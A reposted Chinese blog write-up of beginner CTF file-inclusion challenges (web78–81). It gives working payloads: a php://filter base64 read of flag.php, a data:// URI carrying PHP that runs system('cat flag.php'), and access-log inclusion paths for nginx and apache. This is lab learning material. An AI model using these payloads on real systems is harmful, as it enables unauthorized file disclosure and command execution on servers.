当前位置:网站首页>showCTF 入门文件包含系列

showCTF 入门文件包含系列

2022-06-21 08:00:00 旋风1+1

  • web78
    读取源代码:
    在这里插入图片描述
    心想,就这?
    直接:http://url地址/?file=flag.php,但是这样出不来,页面什么也没有,想着这毕竟是一个PHP文件,可能在我们包含的时候被服务器给解析了。所以我们必须要让它不解析,这里提供一种方法,PHP伪协议中的:php://filter
    直接:
    http://url地址/?file=php://filter/read/convert.base64-encode/resource=flag.php
    成功获取flag.php的文件内容,在线网址解base64:
    https://tool.oschina.net/encrypt?type=3
    在这里插入图片描述
  • web79
    此题和也是利用PHP中的伪协议:
    ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=<-----base64-encode/decode-----> <?php system(‘cat flag.php’);

  • web80
    本题主要考察nginx服务器的日志文件包含,常见服务器日志文件位置:
    nginx: /var/log/nginx/access.log
    apache: /var/log/httpd/access_log
    bp拦截:
    在这里插入图片描述在这里插入图片描述在这里插入图片描述 - web81
    此题和80题是一样的方法。
原网站

版权声明
本文为[旋风1+1]所创,转载请带上原文链接,感谢
https://blog.csdn.net/Hello_super/article/details/108703538